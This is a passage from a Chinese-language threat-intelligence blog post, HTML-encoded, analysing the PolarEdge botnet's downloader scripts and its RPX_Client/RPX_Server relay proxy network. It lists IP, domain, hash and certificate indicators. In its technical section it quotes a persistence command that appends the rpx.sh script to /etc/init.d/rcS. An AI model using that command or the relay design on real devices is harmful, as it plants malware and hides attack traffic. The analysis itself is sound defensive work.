<li><strong>2025&#x5E74;6&#x6708;2&#x65E5;</strong>&#xFF0C;&#x6210;&#x529F;&#x6355;&#x83B7;&#x4E86;&#x811A;&#x672C;q&#xFF0C;&#x5B83;&#x4E3A;&#x6211;&#x4EEC;&#x5E26;&#x6765;&#x4E86;&#x672C;&#x6587;&#x7684;&#x7814;&#x7A76;&#x4E3B;&#x89D2;&#x2014;&#x2014;<strong>rpx_client</strong>&#x3002;&#x503C;&#x5F97;&#x4E00;&#x63D0;&#x7684;&#x662F;&#xFF0C;&#x6839;&#x636E;Payload&#x76D1;&#x63A7;&#x7CFB;&#x7EDF;&#x7684;&#x8BB0;&#x5F55;&#xFF0C;IP 111&#x5E76;&#x672A;&#x6301;&#x7EED;&#x63D0;&#x4F9B;&#x4E0B;&#x8F7D;&#x670D;&#x52A1;&#xFF0C;&#x811A;&#x672C;q&#x4EC5;&#x5904;&#x4E8E;&#x95F4;&#x6B47;&#x6027;&#x7684;&#x53EF;&#x4E0B;&#x8F7D;&#x72B6;&#x6001;&#x3002;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_hashpayload.png" alt="polar_hashpayload.png" loading="lazy"></p>
<h2 id="%E5%BD%92%E5%B1%9E%E4%BA%8Epolaredge%E7%9A%84%E5%8E%9F%E5%9B%A0">&#x5F52;&#x5C5E;&#x4E8E;PolarEdge&#x7684;&#x539F;&#x56E0;</h2>
<ul>
<li><strong>82.118.22.155&#x7684;&#x89D2;&#x8272;</strong></li>
</ul>
<p>VT&#x6570;&#x636E;&#x663E;&#x793A;&#xFF0C;IP&#x5730;&#x5740; 82.118.22.155 &#x66FE;&#x5728;2023&#x5E74;12&#x6708;&#x4F20;&#x64AD;&#x8FC7;&#x4E00;&#x4E2A;Shell&#x811A;&#x672C;<strong>a</strong>&#x53CA;&#x4E00;&#x4E2A;ELF&#x683C;&#x5F0F;&#x7684;&#x53EF;&#x6267;&#x884C;&#x6587;&#x4EF6;<strong>w</strong>&#xFF0C;&#x8868;&#x660E;&#x5176;&#x5F88;&#x53EF;&#x80FD;&#x662F;&#x4E00;&#x4E2A;Downloader&#x670D;&#x52A1;&#x5668;&#x3002;PDNS&#x8BB0;&#x5F55;&#x8FDB;&#x4E00;&#x6B65;&#x663E;&#x793A;&#xFF0C;&#x57DF;&#x540D; beastdositadvtofm[.]site &#x5728;&#x540C;&#x4E00;&#x65F6;&#x671F;&#x66FE;&#x89E3;&#x6790;&#x81F3;&#x8BE5;IP&#x3002;&#x6B64;&#x5916;&#xFF0C;&#x8BE5;&#x57DF;&#x540D;&#x4E0E;Sekoia&#x62AB;&#x9732;&#x7684;C2&#x57DF;&#x540D; icecreand[.]cc &#x548C; centrequ[.]cc &#x7684;CNAME&#x8BB0;&#x5F55;&#x5747;&#x6307;&#x5411;&#x540C;&#x4E00;&#x4E3B;&#x673A;&#xFF1A;jurgencindy.asuscomm.com&#x3002;&#x57FA;&#x4E8E;&#x4E0A;&#x8FF0;&#x5F3A;&#x5173;&#x8054;&#xFF0C;&#x6211;&#x4EEC;&#x6709;&#x4FE1;&#x5FC3;&#x5C06;&#x8BE5;&#x57DF;&#x540D;&#x4E0E;IP&#x5F52;&#x56E0;&#x4E8E;PolarEdge&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_cname.png" alt="polar_cname.png" loading="lazy"></p>
<p>&#x6700;&#x8FD1;&#x6211;&#x4EEC;&#x5728;&#x6574;&#x7406;PolarEdge&#x6837;&#x672C;&#x65F6;&#x53C8;&#x53D1;&#x73B0;<strong>&#x77F3;&#x9524;&#x6027;&#x7684;&#x8BC1;&#x636E;</strong>&#xFF0C;&#x8BE5;&#x57DF;&#x540D;&#x548C;IP&#x5747;&#x51FA;&#x73B0;&#x5728;PolarEdge&#x540E;&#x95E8;&#x6837;&#x672C; <code>3e5e99b77012206d4d4469e84c767e6b</code>&#x89E3;&#x5BC6;&#x540E;&#x7684;C2&#x914D;&#x7F6E;&#x4E2D;&#xFF0C;&#x6240;&#x4EE5;82.118.22.155&#x81F3;&#x5C11;&#x5728;2023&#x5E74;12&#x671F;&#x95F4;&#x662F;PolarEdge&#x7684;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#xFF0C;&#x4F20;&#x64AD;&#x7684;&#x6837;&#x672C;a, w&#x6781;&#x6709;&#x53EF;&#x80FD;&#x7528;&#x4E8E;&#x4E0B;&#x8F7D;PolarEdge&#x540E;&#x95E8;&#x3002;&#x6837;&#x672C;a&#xFF0C;w&#x662F;PolarEdge&#x80CC;&#x540E;&#x7684;&#x56E2;&#x4F19;&#x5F00;&#x53D1;&#xFF0C;<strong>&#x5B83;&#x4EEC;&#x672C;&#x8EAB;&#x4F53;&#x73B0;&#x51FA;&#x7684;&#x7279;&#x5F81;&#x80FD;&#x591F;&#x4F5C;&#x4E3A;&#x5F52;&#x56E0;&#x5224;&#x65AD;&#x7684;&#x4F9D;&#x636E;</strong>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_c2config.png" alt="polar_c2config.png" loading="lazy"></p>
<ul>
<li><strong>ELF&#x6837;&#x672C;&#x76F8;&#x4F3C;&#x6027;</strong></li>
</ul>
<p>&#x6837;&#x672C; <code>w</code> &#x65B0;&#x589E;&#x4E86;&#x4E24;&#x4E2A;&#x672A;&#x52A0;&#x5BC6;&#x7684; Section&#xFF1A;<code>xxxx</code> &#x4E0E; <code>cccc</code>&#x3002;&#x76F8;&#x6BD4;&#x4E4B;&#x4E0B;&#xFF0C;&#x5DF2;&#x77E5;&#x7684; Polaredge &#x6837;&#x672C;&#x5219;&#x62E5;&#x6709;&#x4E24;&#x4E2A;&#x7ECF;&#x8FC7;&#x52A0;&#x5BC6;&#x7684; Section&#xFF1A;<code>init_text</code> &#x548C; <code>init_rodata</code>&#x3002;&#x5C3D;&#x7BA1;&#x5B58;&#x5728;&#x52A0;&#x5BC6;&#x4E0E;&#x5426;&#x7684;&#x5DEE;&#x5F02;&#xFF0C;&#x4F46;&#x65B0;&#x589E;&#x533A;&#x6BB5;&#x8FD9;&#x4E00;&#x884C;&#x4E3A;&#x672C;&#x8EAB;&#xFF0C;&#x5DF2;&#x4F53;&#x73B0;&#x51FA;&#x4E24;&#x8005;&#x5728;&#x8BBE;&#x8BA1;&#x7406;&#x5FF5;&#x4E0A;&#x7684;&#x4E00;&#x81F4;&#x6027;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_sections.png" alt="polar_sections.png" loading="lazy"></p>
<p>&#x66F4;&#x91CD;&#x8981;&#x7684;&#x662F;&#xFF0C;w&#x6240;&#x652F;&#x6301;&#x7684;&#x53C2;&#x6570;&#x5B57;&#x7B26;&#x4E32;&#x4EE5;&#x53CA;&#x4E0E;HTTP&#x534F;&#x8BAE;&#x76F8;&#x5173;&#x7684;&#x5B57;&#x6BB5;&#xFF08;&#x5982;Host&#x3001;User-Agent&#x7B49;&#xFF09;&#x5177;&#x6709;&#x975E;&#x5E38;&#x72EC;&#x7279;&#x7684;&#x7279;&#x5F81;&#xFF0C;&#x4E0E;PolarEdge&#x540E;&#x95E8;&#x6837;&#x672C;&#x5B58;&#x5728;&#x660E;&#x663E;&#x540C;&#x6E90;&#x5173;&#x7CFB;&#x3002;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;&#xFF0C;w&#x5B9E;&#x9645;&#x4E0A;&#x662F;&#x4ECE;PolarEdge&#x540E;&#x95E8;&#x6838;&#x5FC3;&#x4EE3;&#x7801;&#x4E2D;&#x5265;&#x79BB;&#x51FA;&#x7684;Connect-back&#x6A21;&#x5757;&#xFF0C;&#x5176;&#x4E13;&#x95E8;&#x804C;&#x80FD;&#x662F;&#x4E0B;&#x8F7D;&#x540E;&#x7EED;&#x6709;&#x6548;&#x8F7D;&#x8377;&#x3002;&#x8FD9;&#x4E00;&#x70B9;&#x4ECE;w&#x552F;&#x4E00;&#x652F;&#x6301;&#x7684;&quot;curk&quot;&#x6A21;&#x5F0F;&#x4E2D;&#x5F97;&#x5230;&#x4E86;&#x8FDB;&#x4E00;&#x6B65;&#x5370;&#x8BC1;&#x2014;&#x2014;&#x8BE5;&#x540D;&#x79F0;&#x5F88;&#x53EF;&#x80FD;&#x662F;&quot;curl&quot;&#x7684;&#x62FC;&#x5199;&#x9519;&#x8BEF;&#xFF08;&#x6216;&#x662F;&#x67D0;&#x79CD;&#x523B;&#x610F;&#x81F4;&#x656C;&#xFF09;&#xFF0C;&#x8FD9;&#x4E5F;&#x4ECE;&#x4FA7;&#x9762;&#x4F50;&#x8BC1;&#x4E86;&#x5176;&#x4E13;&#x95E8;&#x505A;&#x4E3A;&#x201C;&#x4E0B;&#x8F7D;&#x5DE5;&#x5177;&#x201D;&#x7684;&#x529F;&#x80FD;&#x5B9A;&#x4F4D;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_strings.png" alt="polar_strings.png" loading="lazy"></p>
<ul>
<li><strong>&#x811A;&#x672C;&#x76F8;&#x4F3C;&#x6027;</strong><br>
111.119.223.196&#x548C;82.118.22.155&#x4E0D;&#x4EC5;&#x5171;&#x540C;&#x4E00;&#x4E2A;w&#xFF0C;&#x5B83;&#x4EEC;&#x4F20;&#x64AD;&#x7684;&#x811A;&#x672C;&#x4E5F;&#x9AD8;&#x5EA6;&#x76F8;&#x4F3C;&#xFF0C;&#x98CE;&#x683C;&#x51E0;&#x4E4E;&#x4E00;&#x6A21;&#x4E00;&#x6837;&#x3002;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_scripts.png" alt="polar_scripts.png" loading="lazy"></p>
<p>&#x7EFC;&#x4E0A;&#x6240;&#x8FF0;&#xFF0C;&#x6211;&#x4EEC;&#x786E;&#x8BA4;IP&#x5730;&#x5740;111.119.223.196&#x662F;PolarEdge&#x7684;&#x8D44;&#x4EA7;&#x3002;&#x6B64;&#x6B21;&#x6D3B;&#x52A8;&#x901A;&#x8FC7;&#x811A;&#x672C;q&#x548C;w&#x4F20;&#x64AD;&#x7684;&#x65B0;&#x6837;&#x672C;<strong>RPX_Client</strong>&#x5F52;&#x5C5E;&#x4E8E;PolarEdge&#xFF0C;&#x5B83;&#x662F;&#x8BE5;&#x5A01;&#x80C1;&#x9996;&#x6B21;&#x53D1;&#x73B0;&#x7684;&#x7684;&#x4E2D;&#x7EE7;&#x7EC4;&#x4EF6;&#x3002;</p>
<h1 id="3-%E6%8A%80%E6%9C%AF%E5%88%86%E6%9E%90">3: &#x6280;&#x672F;&#x5206;&#x6790;</h1>
<h2 id="%E8%84%9A%E6%9C%ACq%E7%9A%84%E5%8A%9F%E8%83%BD">&#x811A;&#x672C;q&#x7684;&#x529F;&#x80FD;</h2>
<p>&#x6211;&#x4EEC;&#x4E00;&#x5171;&#x6355;&#x83B7;&#x4E86;11&#x4E2A;&#x4E0D;&#x540C;hash&#x503C;&#x7684;&#x811A;&#x672C;q&#xFF0C;&#x7531;&#x4E8E;&#x5B83;&#x4EEC;&#x6709;&#x4F7F;&#x7528;&#x6DF7;&#x6DC6;&#x6280;&#x672F;&#xFF0C;&#x56E0;&#x6B64;&#x5206;&#x6790;&#x4E0A;&#x5E76;&#x6CA1;&#x6709;&#x96BE;&#x5EA6;&#x3002;&#x5B83;&#x4EEC;&#x7684;&#x529F;&#x80FD;&#x51E0;&#x4E4E;&#x4E00;&#x6A21;&#x4E00;&#x6837;&#xFF0C;&#x6838;&#x5FC3;&#x76EE;&#x7684;&#x4E3A;&#x4E0B;&#x8F7D;&#x6267;&#x884C;rpx&#x7EC4;&#x4EF6;&#xFF0C;&#x53EA;&#x662F;&#x4F9B;rpx&#x56DE;&#x8FDE;&#x7684;C2&#x6709;&#x6240;&#x5DEE;&#x5F02;&#x3002;</p>
<ul>
<li><strong>&#x4E0B;&#x8F7D;wget.tar</strong></li>
</ul>
<p>&#x4F7F;&#x7528;w&#x4E0B;&#x8F7D;wget.tar&#xFF0C;&#x6CE8;&#x610F;w&#x7684;&#x53C2;&#x6570;&#xFF0C;&#x5176;&#x4E2D;m&#x8868;&#x793A;&#x6A21;&#x5F0F;&#xFF0C;h&#x662F;&#x8FDC;&#x7A0B;&#x4E3B;&#x673A;&#xFF0C;e&#x662F;&#x7AEF;&#x53E3;&#xFF0C;f&#x662F;&#x672C;&#x5730;&#x8DEF;&#x5F84;&#xFF0C;q&#x662F;&#x8FDC;&#x7A0B;&#x8DEF;&#x5F84;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_wgettar.png" alt="polar_wgettar.png" loading="lazy"></p>
<p><code>wget.tar</code> &#x538B;&#x7F29;&#x5305;&#x5185;&#x5305;&#x542B;&#x4E24;&#x4E2A;&#x6587;&#x4EF6;&#xFF1A;rpx &#x548C; rpx.sh&#x3002;&#x5176;&#x4E2D;&#xFF0C;rpx &#x662F;&#x672C;&#x6587;&#x7684;&#x5206;&#x6790;&#x6838;&#x5FC3;&#xFF0C;&#x5373; <code>rpx_client</code>&#xFF1B;&#x800C; rpx.sh &#x5219;&#x662F;&#x4E00;&#x4E2A;&#x7528;&#x4E8E;&#x6301;&#x4E45;&#x5316;&#x7684;&#x811A;&#x672C;&#x3002;&#x901A;&#x8FC7;&#x6267;&#x884C; <code>echo &quot;/bin/sh /mnt/mtd/rpx.sh &amp;&quot; &gt;&gt; /etc/init.d/rcS</code> &#x547D;&#x4EE4;&#xFF0C;&#x5C06; rpx.sh &#x6CE8;&#x5165;&#x5230; <code>rcS</code> &#x521D;&#x59CB;&#x5316;&#x811A;&#x672C;&#x4E2D;&#xFF0C;&#x4ECE;&#x800C;&#x5B9E;&#x73B0;&#x4E86;&#x6301;&#x4E45;&#x5316;&#x9A7B;&#x7559;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_archive.png" alt="polar_archive.png" loading="lazy"></p>
<ul>
<li><strong>&#x542F;&#x52A8;rpx&#x6838;&#x5FC3;&#x7EC4;&#x4EF6;</strong></li>
</ul>
<p>rpx&#x5C06;&#x88AB;&#x4FB5;&#x5165;&#x8BBE;&#x5907;&#x52A0;&#x5165;&#x5230;ORB&#x7F51;&#x7EDC;&#xFF0C;&#x5B83;&#x7684;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#x4E3A;&#x63A7;&#x5236;&#x8282;&#x70B9;&#x7684;ip&#xFF0C;&#x7B2C;2&#x4E2A;&#x53C2;&#x6570;&#x4E3A;&#x7AEF;&#x53E3;&#xFF0C;&#x7B2C;3&#x4E2A;&#x53C2;&#x6570;&#x4E3A;brand&#xFF0C;&#x53EF;&#x80FD;&#x7406;&#x89E3;&#x6210;&#x5206;&#x7EC4;&#x3002;&#x6211;&#x4EEC;&#x5728;&#x4E86;11&#x4E2A;q&#x811A;&#x672C;&#x4E2D;&#x4E00;&#x5171;&#x6536;&#x96C6;&#x4E86;10&#x4E2A;&#x7684;&#x63A7;&#x5236;&#x8282;&#x70B9;IP&#xFF0C;&#x4F7F;&#x7528;&#x7684;&#x7AEF;&#x53E3;&#x90FD;&#x662F;55555&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_launchrpx.png" alt="polar_launchrpx.png" loading="lazy"></p>
<h2 id="%E5%89%96%E6%9E%90rpx%E7%B3%BB%E7%BB%9F">&#x5256;&#x6790;RPX&#x7CFB;&#x7EDF;</h2>
<ul>
<li><strong>RPX&#x670D;&#x52A1;&#x5668;&#x8282;&#x70B9;</strong></li>
</ul>
<p>RPX&#x670D;&#x52A1;&#x5668;&#x8282;&#x70B9;&#x901A;&#x5E38;&#x8FD0;&#x884C;&#x56DB;&#x4E2A;&#x6838;&#x5FC3;&#x670D;&#x52A1;&#xFF1A;RPX_Server&#x3001;Nginx&#x3001;Go-Admin&#x4E0E;Go-Shadowsocks&#x3002;&#x5728;&#x8FD9;&#x4E9B;&#x670D;&#x52A1;&#x4E2D;&#xFF0C;RPX_Server&#x4E0E;<strong>&#x4E8C;&#x6B21;&#x5F00;&#x53D1;&#x7684;Go-Admin</strong>&#x662F;PolarEdge&#x7684;&#x5173;&#x952E;&#x7EC4;&#x4EF6;&#x2014;&#x2014;RPX_Server&#x4F5C;&#x4E3A;&#x5DE5;&#x4F5C;&#x8282;&#x70B9;&#xFF08;worker&#xFF09;&#xFF0C;&#x8D1F;&#x8D23;&#x5B9E;&#x9645;&#x5BF9;&#x5916;&#x63D0;&#x4F9B;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#xFF1B;Go-Admin&#x5219;&#x4F5C;&#x4E3A;&#x7BA1;&#x7406;&#x8282;&#x70B9;&#xFF08;administrator&#xFF09;&#xFF0C;&#x627F;&#x62C5;&#x8282;&#x70B9;&#x6CE8;&#x518C;&#x3001;&#x4F1A;&#x8BDD;&#x9A8C;&#x8BC1;&#x3001;&#x6307;&#x4EE4;&#x5206;&#x53D1;&#x4EE5;&#x53CA;&#x5BFC;&#x51FA;Clash&#x914D;&#x7F6E;&#x4F9B;&#x7B2C;&#x4E09;&#x65B9;&#x4F7F;&#x7528;&#x7B49;&#x4EFB;&#x52A1;&#x3002;Nginx&#x91C7;&#x7528;&#x53CD;&#x5411;&#x4EE3;&#x7406;&#x6A21;&#x5F0F;&#xFF0C;&#x5C06;19999&#x7AEF;&#x53E3;&#x7684;&#x6D41;&#x91CF;&#x8F6C;&#x53D1;&#x81F3;Go-Admin&#x670D;&#x52A1;&#xFF0C;&#x800C;Go-Shadowsocks&#x5219;&#x4E13;&#x95E8;&#x63D0;&#x4F9B;Shadowsocks&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x3002;</p>
<p>&#x8FD9;&#x4E9B;&#x670D;&#x52A1;&#x7684;&#x8FD0;&#x884C;&#x4F7F;&#x670D;&#x52A1;&#x5668;&#x8282;&#x70B9;&#x5448;&#x73B0;&#x51FA;&#x4EE5;&#x4E0B;&#x7F51;&#x7EDC;&#x7279;&#x5F81;&#xFF1A;</p>
<ol>
<li>
<p><code>Nginx(&#x7AEF;&#x53E3;19999)</code>: &#x4F7F;&#x7528;&#x56FA;&#x5B9A;&#x7684;&#x81EA;&#x7B7E;&#x540D;&#x8BC1;&#x4E66;&#xFF0C;&#x5176;&#x6307;&#x7EB9;&#x4E3A;&#xFF1A;<br>
3f00058448b8f7e9a296d0cdf6567ceb23895345eae39d472350a27b24efe999</p>
</li>
<li>
<p><code>RPX_Server(&#x7AEF;&#x53E3;55555&#x3001;55557&#x548C;55558)</code>: &#x4F7F;&#x7528;&#x56FA;&#x5B9A;&#x7684;&#x81EA;&#x7B7E;&#x540D;&#x8BC1;&#x4E66;&#xFF0C;&#x5176;&#x6307;&#x7EB9;&#x4E3A;&#xFF1A;<br>
e234e102cd8de90e258906d253157aeb7699a3c6df0c4e79e05d01801999dcb5</p>
</li>
<li>
<p><code>Go-Admin(&#x7AEF;&#x53E3; 55560)</code>: &#x5C3D;&#x7BA1;&#x8BE5;&#x670D;&#x52A1;&#x4F7F;&#x7528;&#x52A8;&#x6001;&#x751F;&#x6210;&#x7684;&#x81EA;&#x7B7E;&#x540D;&#x8BC1;&#x4E66;&#xFF0C;&#x4F46;&#x5176;&#x8BC1;&#x4E66;&#x4E2D;&#x5B58;&#x5728;&#x4E00;&#x4E2A;&#x6052;&#x5B9A;&#x4E0D;&#x53D8;&#x7684;&#x7279;&#x5F81;&#xFF1A;&#x9881;&#x53D1;&#x8005;&#x4E0E;&#x6240;&#x6709;&#x8005;&#x5B57;&#x6BB5;&#x5747;&#x88AB;&#x8BBE;&#x7F6E;&#x4E3A;&#x7A7A;&#x503C;(<code>O = null, CN = null</code>)&#xFF0C;&#x5E8F;&#x5217;&#x53F7;&#x4E3A;<code>123456</code>&#x3002;</p>
</li>
</ol>
<ul>
<li><strong>RPX Server</strong></li>
</ul>
<p>&#x7B80;&#x800C;&#x8A00;&#x4E4B;&#xFF0C;RPX Server &#x662F;&#x4E00;&#x79CD;<strong>&#x53CD;&#x5411;&#x8FDE;&#x63A5;&#x4EE3;&#x7406;&#x7F51;&#x5173;</strong>&#xFF0C;&#x6838;&#x5FC3;&#x673A;&#x5236;&#x5728;&#x4E8E;&#xFF1A;&#x5B83;&#x672C;&#x8EAB;&#x4E0D;&#x4F1A;&#x76F4;&#x63A5;&#x8FDE;&#x63A5;&#x5230;&#x76EE;&#x6807;&#x5730;&#x5740;&#xFF0C;&#x800C;&#x662F;&#x8C03;&#x5EA6;&#x5DF2;&#x6CE8;&#x518C;&#x7684;&#x4EE3;&#x7406;&#x8282;&#x70B9;&#x53BB;&#x8FDE;&#x63A5;&#x76EE;&#x6807;&#xFF0C;&#x5E76;&#x8BA9;&#x4EE3;&#x7406;&#x8282;&#x70B9;&#x53CD;&#x5411;&#x8FDE;&#x63A5;&#x56DE;&#x7F51;&#x5173;&#x5206;&#x914D;&#x7684;&#x4E00;&#x4E2A;&#x4E34;&#x65F6;&#x7AEF;&#x53E3;&#xFF0C;&#x6700;&#x7EC8;&#x5728;&#x6B64;&#x7AEF;&#x53E3;&#x4E0A;&#x5B8C;&#x6210;&#x5BA2;&#x6237;&#x7AEF;&#x4E0E;&#x76EE;&#x6807;&#x4E4B;&#x95F4;&#x6D41;&#x91CF;&#x7684;&#x900F;&#x660E;&#x6865;&#x63A5;&#x3002;</p>
<p>&#x4EE5;&#x4E0B;&#x901A;&#x8FC7;&#x5B9E;&#x9645;&#x6D4B;&#x8BD5;&#x8BF4;&#x660E;&#x5176;&#x8FD9;&#x4E00;&#x673A;&#x5236;&#xFF1A;&#x6211;&#x4EEC;&#x5728;&#x65E5;&#x672C;&#x6D4B;&#x8BD5;&#x4E3B;&#x673A; 45.x.x.8 &#x4E0A;&#x8FD0;&#x884C; RPX_Client&#xFF0C;&#x5C06;&#x5176;&#x6CE8;&#x518C;&#x81F3; RPX Server &#x8282;&#x70B9; 8.216.14.9&#x3002;&#x968F;&#x540E;&#x5728;&#x672C;&#x5730;&#x8FD0;&#x884C; go-shadowsocks &#x5BA2;&#x6237;&#x7AEF;&#x8FDE;&#x63A5;&#x81F3;&#x8BE5;&#x63A7;&#x5236;&#x8282;&#x70B9;&#xFF0C;&#x5E76;&#x901A;&#x8FC7; ipinfo.io &#x67E5;&#x770B;&#x51FA;&#x53E3; IP&#x3002;</p>
<p>&#x5C3D;&#x7BA1; go-shadowsocks &#x7684;&#x65E5;&#x5FD7;&#x663E;&#x793A;&#x8FDE;&#x63A5;&#x8DEF;&#x5F84;&#x4E3A;<code>&#x672C;&#x5730; proxy &#x2190;&#x2192; RPX Server &#x2190;&#x2192; ipinfo.io</code>&#xFF0C;&#x4F46;&#x901A;&#x8FC7; curl --socks5 &#x8FD4;&#x56DE;&#x7684;&#x5B9E;&#x9645; IP &#x5730;&#x5740;&#x53EF;&#x77E5;&#xFF0C;&#x771F;&#x5B9E;&#x7684;&#x5B8C;&#x6574;&#x8DEF;&#x5F84;&#x4E3A;&#xFF1A;<strong>&#x672C;&#x5730; proxy &#x2190;&#x2192; RPX Server &#x2190;&#x2192; RPX Client (45.x.x.8) &#x2190;&#x2192; ipinfo.io</strong>&#x3002; &#x5728;&#x5B9E;&#x9645;&#x653B;&#x51FB;&#x7684;&#x573A;&#x666F;&#x4E2D;&#xFF0C;&#x8FD9;&#x79CD;&#x591A;&#x8DF3;&#x80FD;&#x591F;&#x5F88;&#x597D;&#x7684;&#x9690;&#x85CF;&#x653B;&#x51FB;&#x6E90;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_proxyexample.jpg" alt="polar_proxyexample.jpg" loading="lazy"></p>
<p>Server&#x8FD0;&#x884C;&#x65F6;&#x63A5;&#x6536;&#x4E24;&#x4E2A;&#x53C2;&#x6570;&#xFF1A;&#x7B2C;&#x4E00;&#x4E2A;&#x662F;&#x7528;&#x4E8E;&#x4E0E; RPX_Client &#x4EA4;&#x4E92;&#x7684;&#x7AEF;&#x53E3;&#xFF1B;&#x7B2C;&#x4E8C;&#x4E2A;&#x662F;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x7684;&#x57FA;&#x7840;&#x7AEF;&#x53E3;&#xFF0C;&#x57FA;&#x4E8E;&#x5B83;&#x5F00;&#x542F;&#x4E09;&#x79CD;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#xFF1A;SOCKS5&#xFF08;&#x53C2;&#x6570;&#x4E8C;&#xFF09;&#x3001;SOCKS5 over TLS&#xFF08;&#x53C2;&#x6570;&#x4E8C;+1&#xFF09; &#x548C; Trojan&#xFF08;&#x53C2;&#x6570;&#x4E8C;+2&#xFF09;&#x3002;&#x76EE;&#x524D;&#x5B9E;&#x9645;&#x89C2;&#x6D4B;&#x5230;&#x7684;&#x53C2;&#x6570;&#x503C;&#x5206;&#x522B;&#x4E3A; 55555 &#x4E0E; 55556&#x3002;&#x5173;&#x4E8E; RPX Server &#x7684;&#x5B9E;&#x73B0;&#x7EC6;&#x8282;&#xFF0C;Censys &#x5DF2;&#x6709;&#x6587;&#x7AE0;&#x8FDB;&#x884C;&#x6DF1;&#x5165;&#x5206;&#x6790;&#xFF0C;&#x672C;&#x6587;&#x4E0D;&#x518D;&#x91CD;&#x590D;&#xFF0C;&#x6709;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#x53EF;&#x8FDB;&#x4E00;&#x6B65;&#x67E5;&#x9605;&#x5176;&#x62A5;&#x544A;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_servermain.png" alt="polar_servermain.png" loading="lazy"></p>
<ul>
<li><strong>RPX Client</strong></li>
</ul>
<p>&#x6211;&#x4EEC;&#x4E00;&#x5171;&#x6355;&#x83B7;&#x4E86;4&#x4E2A;&#x7684;RPX Client&#x6837;&#x672C;&#xFF0C;&#x5176;&#x4E2D;3&#x4E2A;&#x6765;&#x81EA;IP&#x5730;&#x5740;111.119.223.196&#xFF0C;&#x53E6;&#x5916;1&#x4E2A;&#x6765;&#x81EA;VirusTotal&#x3002;&#x6765;&#x81EA;&#x8BE5;IP&#x7684;&#x6837;&#x672C;&#x5747;&#x4E3A;ARM&#x67B6;&#x6784;&#xFF0C;&#x800C;VirusTotal&#x63D0;&#x4F9B;&#x7684;&#x6837;&#x672C;&#x4E3A;MIPS&#x67B6;&#x6784;&#xFF0C;&#x8FD9;&#x8868;&#x660E;RPX&#x5728;&#x91CE;&#x8FD8;&#x5B58;&#x5728;&#x5176;&#x4ED6;&#x4F20;&#x64AD;&#x6E20;&#x9053;&#x3002;&#x8FD9;4&#x4E2A;&#x6837;&#x672C;&#x7684;&#x7248;&#x672C;&#x53F7;&#x5747;&#x4E3A;0.0.13&#xFF0C;&#x6839;&#x636E;&#x73B0;&#x6709;&#x7EDF;&#x8BA1;&#x6570;&#x636E;&#xFF0C;&#x8BE5;&#x7248;&#x672C;&#x662F;&#x76EE;&#x524D;&#x7684;&#x4E3B;&#x8981;&#x6D41;&#x884C;&#x7248;&#x672C;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_version.png" alt="polar_version.png" loading="lazy"></p>
<p>&#x5728;4&#x4E2A;&#x6837;&#x672C;&#x4E2D;&#xFF0C;<code>7fa5fb15098efdf76e4c016e2e17bb38</code> &#x6BD4;&#x8F83;&#x7279;&#x522B;&#xFF0C;&#x56E0;&#x4E3A;&#x5B83;&#x5728;&#x8FD0;&#x884C;&#x65F6;&#x4F1A;&#x5728;&#x63A7;&#x5236;&#x53F0;&#x6253;&#x5370;&#x51FA;&#x8C03;&#x8BD5;&#x4FE1;&#x606F;&#x3002;&#x6211;&#x4EEC;&#x4EE5;&#x5B83;&#x4E3A;&#x4E3B;&#x8981;&#x5206;&#x6790;&#x5BF9;&#x8C61;&#xFF0C;&#x5176;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code>MD5: 7fa5fb15098efdf76e4c016e2e17bb38
MAGIC: ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped
PACKER: None
</code></pre>
<p>RPX_CLIENT&#x5728;PolarEdge&#x7F51;&#x7EDC;&#x4E2D;&#x5145;&#x5F53;jumpserver&#x7684;&#x89D2;&#x8272;&#xFF0C;&#x8FD9;&#x4E00;&#x70B9;&#x53EF;&#x4ECE;&#x6837;&#x672C;&#x4E2D;&#x66B4;&#x9732;&#x7684;&#x6E90;&#x7801;&#x6587;&#x4EF6;&#x540D;&#xFF0C;&#x8FD0;&#x884C;&#x65F6;&#x7684;&#x65E5;&#x5FD7;&#x5F97;&#x5230;&#x9A8C;&#x8BC1;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_logs.png" alt="polar_logs.png" loading="lazy"></p>
